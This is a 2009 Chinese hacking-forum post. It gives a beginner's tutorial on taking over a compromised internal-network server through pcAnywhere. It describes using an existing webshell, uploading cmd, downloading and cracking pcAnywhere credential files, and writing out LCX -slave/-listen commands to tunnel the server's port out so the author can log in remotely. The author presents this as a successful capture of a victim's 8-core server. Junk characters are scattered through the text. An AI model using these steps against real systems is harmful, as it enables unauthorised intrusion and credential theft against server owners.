|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。8 W( _) M5 L) }) L, a. ?( W0 x. T
1 i8 M2 X. {1 }5 K' ^提权方法:pcanywhere+LCX- T8 q1 h& r$ A4 \0 r
+ U j* t: s3 X6 ]# ^7 V/ d: R
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
; U( q d: Q8 B& v5 Y* U
& t: q9 E% U4 T! Q$ k; y) s在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
, w& V: `" O0 e6 ]/ i0 b% {
) @- [9 k; E" S& s1 I1 F4 g* }* w* a, H" `$ v
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。; M8 E7 r6 i& I ^- \9 k5 J
0 x0 J5 I6 I( M; |' l
4 n& u" A- U& _7 w5 M1 Z呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
) u9 n4 d- c% R) P+ Q5 N- l- D0 d1 d1 X' s n9 j& L/ R
# Y3 i' R7 v/ @7 f3 Z8 ?' y' N6 P; a
a* Z6 ^1 A5 v: R% X: E& v
) z9 i9 X! K: g( B# y* Q, l0 x" @
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
0 \5 [( f: n7 I. ^5 F5 \: E+ q' F4 t3 P
/ f/ q5 e3 w) u% aLCX的用法再简单说下:
: @& g1 v- G& m1 I) K, E& t: R/ ~! [* l% P8 A* }' z9 p
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)+ n. V& f1 Y# @8 {* r5 R
2 q1 P. ]7 @# X9 Q
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
$ \( l( R1 b9 K P. A; a# B$ b7 k3 G5 y& H, _: G. k9 @
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
' b3 H# P% J1 l) i' T2 `顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``' d1 T9 u) ]7 E5 Z2 o3 N- W0 V
' H' a% o i3 A4 i1 s" \3 X; n$ ^% p# o" m% C" T
4 c8 R( r. y R0 x0 h7 A% a" T
, M* A+ s5 C: i& Y j0 f呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。. I- U& |) s0 @' E0 l+ K/ t
x9 Z9 i6 n2 [0 J
9 @& [+ E/ |: q
% y/ M1 i7 A% m5 W- P {" u8 i; ~" ]; @9 t/ _# p4 ]9 x* K5 Y& W
我们本地连接试试,输入我们刚破解的账号密码
' o' t3 O# k# Q# L; n
7 O) @1 c) n6 N3 T2 G: {( c/ v- ?. B
呵呵``连接成功,服务器不错,又一个8核^︵^
! l; i; H" j3 y/ B; W' A: ~- T7 U, U" K. Q! w" x7 f
6 u6 d* S9 K0 R" ?; Z6 ]5 l) \/ a5 ^: e2 `, U
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
